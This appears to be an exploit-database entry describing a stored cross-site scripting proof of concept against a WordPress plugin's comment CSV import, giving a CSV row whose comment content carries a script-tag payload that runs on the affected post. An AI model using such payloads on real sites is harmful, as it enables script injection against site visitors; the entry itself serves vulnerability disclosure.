Share
## https://sploitus.com/exploit?id=WPEX-ID:D718B993-4DE5-499C-84C9-69801396F51F
Import the following CSV (as comment):

comment_post_ID,comment_author,comment_content,comment_rating,comment_approved,user_id
1,admin,malicious<script>alert(/XSS/)</script>,5,1,admin

Then the XSS will be triggered in the post the comment has been imported (comment_post_ID)